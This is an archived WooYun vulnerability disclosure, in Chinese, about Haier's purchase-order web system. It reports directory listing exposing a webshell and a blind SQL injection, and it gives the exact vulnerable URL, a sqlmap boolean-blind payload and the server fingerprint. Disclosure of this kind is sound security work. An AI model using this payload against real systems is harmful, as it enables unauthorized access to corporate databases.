乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-19: 细节已通知厂商并且等待厂商处理中 2015-06-19: 厂商已经确认,细节仅向厂商公开 2015-06-29: 细节向核心白帽子及相关领域专家公开 2015-07-09: 细节向普通白帽子公开 2015-07-19: 细节向实习白帽子公开 2015-08-03: 细节向公众公开
还能看到小马马……
海尔的间接采购订单管理系统
http://gopurchase.haier.com/GOPurchase/
0x01:服务器配置不当。
http://gopurchase.haier.com/GOPurchase/page/
可遍历整个站点目录,看到马马了。
0x02:存在SQL注入。
http://gopurchase.haier.com/GOPurchase/page/Purchase/DC/BDCPurchaseApplyBill/BDCPurchaseApplyBillList.aspx
查询订单编号处可SQL盲注。
Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=20Dzc9dE6zusN8FnNgRsQ8R9AjfDeFNobXHRzFDX6rcVe6WyoGR8CLsoactQgkISTjlLOZaXCp+ZVl++KUcmZmkjPhGcrlBH8ObEXrHMwtgb4H9K+YNAXqkJgDClub14voNp0gWZc3PzPw8zpR1PHW5KSf5Gqb07k03RKApBt31QNiNsBmU8EBNejTZTU+rHhrSEzTIW0Y9dknE5J5mWpzUvRQN6UmUiQ9MG8UFtu0rCpn6dfwFCazWoVAvTEN7j6329KH5Y0nawkiS3VQEWsbN3dq0Oji3cgroNImmPOTbtmyqaD8UKhogI/PCQB1fEPB316438EdIj4mpp3v63fSgM7t2qcgkUUc+Ql2MRGW5TSWqkEVnNFXVVBx/mPG7zdEfHPPloPk/1fSCJyFfbEvievGcnIBzd6FM1HC73Zmh+M0CMjfJpbq1RLVXnqdelM5hfnULlui1dn6KHBnlDgweS7CNggYoU0fEtvX1Cgg972HnK2s55ZA7A9hAilJQjTlY6z+oZcOAfIT+AnM9uqOkdIi5zO9YAJccdUB+wHrOiIwdChfHK07w7vuroHrzQ987BXBJFtf0ar2znEkaCTcmDKiRa84L8lnLd5CF87DU=&__VIEWSTATEENCRYPTED=&txt_CheckNo=2%' AND 8323=8323 AND '%'='&Button1=%B2%E9%D1%AF&currPage=1---[13:53:13] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005
网速不给力,盲注太慢,不去跑了。
过滤。。
危害等级:高
漏洞Rank:18
确认时间:2015-06-19 18:35
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无